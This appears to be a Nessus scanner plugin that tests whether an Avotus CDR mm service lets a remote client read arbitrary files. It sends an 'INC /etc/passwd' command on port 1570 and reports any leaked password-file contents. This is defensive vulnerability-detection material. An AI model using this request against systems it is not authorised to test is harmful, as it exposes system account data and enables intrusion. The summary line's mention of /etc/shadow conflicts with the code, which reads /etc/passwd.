home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / avotus_mm.nasl < prev    next >
Text File  |  2005-03-31  |  2KB  |  80 lines
  1. #
  2. # See the Nessus Scripts License for details
  3. #
  4. #
  5. #---------------------------------------------------------------------------
  6. # This plugin has not been verified - meaning that there MIGHT be no
  7. # flaw in the mentionned product.
  8. #
  9.  
  10. if(description)
  11. {
  12.  script_id(11948);
  13.  script_version ("$Revision: 1.4 $");
  14.  name["english"] = "Avotus mm File Retrieval attempt";
  15.  script_name(english:name["english"]);
  16.  
  17.  desc["english"] = "
  18. The script attempts to force the remote Avotus CDR mm service to include 
  19. the file /etc/passwd accross the network.
  20.  
  21. Solution : The vendor has provided a fix for this issue to all customers. 
  22. The fix will be included in future shipments and future versions of the product.
  23. If an Avotus customer has any questions about this problem, they should contact
  24. support@avotus.com.
  25.  
  26. Risk factor : High";
  27.  
  28.  script_description(english:desc["english"]);
  29.  
  30.  summary["english"] = "Retrieves /etc/shadow";
  31.  
  32.  script_summary(english:summary["english"]);
  33.  
  34.  script_category(ACT_GATHER_INFO);
  35.  
  36.  script_copyright(english:"Anonymous");
  37.         
  38.  family["english"] = "Remote file access";
  39.  script_family(english:family["english"]);
  40.  script_dependencie("find_service.nes");
  41.  script_require_ports(1570, "Services/avotus_mm");
  42.  
  43.  exit(0);
  44. }
  45.  
  46. #
  47. # The script code starts here
  48. #
  49.  
  50. include("misc_func.inc");
  51.  
  52. cmd = string("INC /etc/passwd\n");
  53.  
  54.  
  55. port = get_kb_item("Services/avotus_mm");
  56. if(!port)port = 1570;
  57. if(get_port_state(port))
  58. {
  59.  soc = open_sock_tcp(port);
  60.  if(soc)
  61.  {
  62.   send(socket:soc, data:cmd);
  63.   res = recv(socket:soc, length:65535);
  64.   if(egrep(pattern:"root:.*:0:[01]:", string:res))
  65.    {
  66.     report =  "
  67. The Avotus CDR mm service allows any file to be retrieved remotely.
  68. Here is an excerpt from the remote /etc/passwd file : 
  69. " + res + "
  70.  
  71. Solution : disable this service
  72. Risk factor : High";
  73.  
  74.    security_hole(port:port, data:report);
  75.    }
  76.   close(soc);
  77.   }
  78. }
  79.  
  80.